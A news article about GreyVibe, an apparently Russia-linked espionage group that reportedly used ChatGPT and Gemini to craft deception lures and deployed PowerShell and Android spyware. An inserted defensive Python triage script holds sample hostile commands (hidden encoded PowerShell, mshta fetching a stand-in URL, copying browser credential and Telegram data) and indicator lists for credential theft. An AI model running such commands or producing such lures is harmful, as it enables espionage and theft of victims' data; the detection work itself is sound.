The GreyVibe group, linked to Russia, leverages ChatGPT and Gemini AI to design cyberattacks against strategic targets. Researchers detected the activity at the beginning of 2026, although analyses suggest that the operation had been active since at least August 2025.
Their main targets have been Ukrainian organizations or entities related to Ukraine, including government bodies, military structures, private companies, and civil organizations.
A multi-front espionage campaign
Everything indicates that GreyVibe maintains activity compatible with intelligence operations aligned with Russia's strategic interests. However, there is still insufficient evidence to attribute the campaign directly to the Russian state, according to Bleeping Computer.
The evidence pointing to a Russian origin includes the language used in various malicious tools, comments found in the code of the programs used, and the time zone configuration of their command and control infrastructures, adjusted to Moscow's time zone.
What sets GreyVibe apart from other groups is the breadth of techniques employed. Researchers have identified several simultaneous operations aimed at deceiving victims through emails, fake websites, fraudulent applications, and espionage tools specifically designed for each scenario.
The role of ChatGPT and Gemini in the attacks
One of the most striking aspects of the report is the intensive use of generative artificial intelligence. Analysts detected indications that GreyVibe used tools like ChatGPT, Google Gemini, and Ideogram AI to develop highly realistic content for their deception campaigns.
Thanks to these platforms, the attackers were able to generate forged documents, convincing images, and social engineering materials with a level of detail superior to that usually observed in traditional campaigns.
AI made it possible to build more credible decoys, tailored to different victim profiles and with a visual quality capable of significantly increasing the success rate of the attacks.
This phenomenon reflects a growing trend within the cybercrime ecosystem: the use of language models to automate tasks that previously required more time, specialized knowledge, and human resources.
Malicious emails and fraudulent downloads
Among the detected campaigns was an operation based on targeted emails sent to specific victims.
The messages distributed compressed files hosted on legitimate cloud storage services. The documents appeared to originate from government bodies, energy companies, telecommunications entities, or emergency services linked to Ukraine.
Once downloaded, the files activated different malicious payloads capable of compromising the affected systems.
The use of legitimate platforms to distribute malware makes it difficult to detect these threats and increases users' trust in the received files.
Fake portals and digital traps
Another technique employed involved creating websites that mimicked widely known services.
Some simulated security verification processes similar to those used by popular video conferencing platforms or web protection systems. Victims were induced to execute commands on their own systems under the false belief of completing a security check.
Researchers also located fake dating portals and adult sites aimed at the Ukrainian public. These sites distributed spyware for Android and malicious tools for Windows systems capable of collecting sensitive information.
Researchers also detected fictional personas used in messaging applications to hold conversations with victims and build trust before the information theft began.
Malware designed for espionage
GreyVibe employed several families of malware specifically developed for their operations.
Among them, LegionRelay stands out: a PowerShell-based remote access trojan that can exfiltrate files, capture the screen, obtain credentials stored in browsers, and collect data from messaging applications such as Telegram and WhatsApp.
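Two of the behaviours described above leave telemetry a defender can act on: a victim pasting and running a command from a fake "security check" page shows up as a scripting interpreter spawned by the user's desktop shell, and a PowerShell-based collector like the one described for LegionRelay shows up in PowerShell script block logs. The triage script below is an added example written for this article; it is not code from the researchers, Bleeping Computer, or the group, and the report does not publish detection rules. It assumes a simplified `key=value` event format standing in for process-creation events (Sysmon Event ID 1 / Windows 4688) and script block logging (Windows Event ID 4104); the sample events, the parent/child pairing, and the indicator strings are constructed for illustration.

```python
"""Triage constructed Windows telemetry for two behaviours from the article:
(1) an interpreter launched by the user's shell with lure-like arguments, which is
    how a pasted "verification" command appears; and
(2) PowerShell script blocks touching screen capture, browser credential stores or
    messaging-app data, the collection attributed to the PowerShell RAT.
All events here are constructed samples, not real telemetry."""
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample events, one per line. Field names are an assumed simplification
# of Sysmon/4688 process creation and 4104 script block logging.
SAMPLE_EVENTS = """\
type=process parent=explorer.exe image=powershell.exe cmdline="powershell -w hidden -enc BASE64PLACEHOLDER"
type=process parent=outlook.exe image=winword.exe cmdline="WINWORD.EXE /n report.docx"
type=process parent=explorer.exe image=mshta.exe cmdline="mshta https://verify-example.invalid/check"
type=process parent=svchost.exe image=powershell.exe cmdline="powershell -File C:\\Scripts\\inventory.ps1"
type=scriptblock text="Get-ChildItem $env:APPDATA\\Telegram Desktop\\tdata | Compress-Archive"
type=scriptblock text="$bmp = New-Object Drawing.Bitmap 1920,1080; $g.CopyFromScreen(0,0,0,0,$bmp.Size)"
type=scriptblock text="Get-Process | Where-Object CPU -gt 10"
type=scriptblock text="Copy-Item 'C:\\Users\\u\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data' $env:TEMP"
"""


@dataclass(frozen=True)
class Finding:
    line_no: int   # 1-based line number in the input
    rule: str
    detail: str


# Interpreters a fake "verification" page typically asks the victim to run.
USER_RUN_INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
# Parent that indicates a human typed or pasted the command (Run dialog, desktop shell).
USER_SHELL_PARENTS = {"explorer.exe"}
# Traits that separate a pasted lure from an admin opening a shell: a bare
# "powershell" from the Run dialog is common and produces no finding on its own.
SUSPICIOUS_ARGS = ("-enc", "-w hidden", "-windowstyle hidden", "http", "iex", "invoke-expression")

# Script content matching the collection the article attributes to the RAT.
COLLECTION_INDICATORS = {
    "CopyFromScreen": "screen capture via System.Drawing",
    "Login Data": "Chromium browser credential store",
    "tdata": "Telegram Desktop data directory",
    "WhatsApp": "WhatsApp data",
}

_KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_event(line: str) -> dict:
    """Parse one key=value event line; values may be double-quoted."""
    return {key: quoted or bare for key, quoted, bare in _KV.findall(line)}


def check_process(ev: dict) -> Optional[str]:
    """Flag a scripting interpreter started by the desktop shell with lure-like arguments."""
    parent, image = ev.get("parent", "").lower(), ev.get("image", "").lower()
    cmd = ev.get("cmdline", "").lower()
    if parent in USER_SHELL_PARENTS and image in USER_RUN_INTERPRETERS:
        hits = [arg for arg in SUSPICIOUS_ARGS if arg in cmd]
        if hits:
            return f"{image} launched from {parent} with {', '.join(hits)}"
    return None


def check_scriptblock(ev: dict) -> Optional[str]:
    """Flag script blocks that touch the data sources the RAT is described as collecting."""
    text = ev.get("text", "").lower()
    hits = [label for needle, label in COLLECTION_INDICATORS.items() if needle.lower() in text]
    return "; ".join(hits) if hits else None


def triage(events_text: str) -> list:
    """Run both checks over a block of events and return the findings in input order."""
    findings = []
    for n, line in enumerate(events_text.splitlines(), start=1):
        if not line.strip():
            continue
        ev = parse_event(line)
        if ev.get("type") == "process":
            rule, detail = "user_run_interpreter", check_process(ev)
        elif ev.get("type") == "scriptblock":
            rule, detail = "powershell_collection", check_scriptblock(ev)
        else:
            continue
        if detail:
            findings.append(Finding(n, rule, detail))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"line {f.line_no}: {f.rule}: {f.detail}")
```

On the sample, the two explorer.exe-spawned interpreters with hidden/encoded or URL arguments and the three script blocks touching Telegram data, the screen, and the browser credential store are reported; the scheduled inventory script and the routine `Get-Process` block are not. The process rule deliberately requires a suspicious argument on top of the parent/child pairing, because an administrator opening PowerShell from the Run dialog is ordinary; script block logging must be enabled through policy for the second rule to have any input at all.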
Researchers believe that part of its development may have also relied on artificial intelligence tools.
Another identified threat is PhantomRelay, capable of collecting information from the compromised system, executing remote commands, and dynamically loading scripts.
On Android devices, GreyVibe used FallSpy, a spyware designed to collect contacts, call logs, locations, media files, network information, and SIM card data.
A group halfway between espionage and cybercrime
Although the observed activity resembles state-sponsored intelligence campaigns, researchers found behaviors uncommon in highly sophisticated governmental actors.
For example, some test versions of the malware were uploaded to public analysis platforms, a practice usually avoided in professional espionage operations. Occasional deployment of cryptocurrency mining programs on compromised systems was also detected.
These indications suggest that GreyVibe could be composed of former cybercriminals, current members of criminal organizations, or even hybrid teams combining economic interests with geopolitical objectives.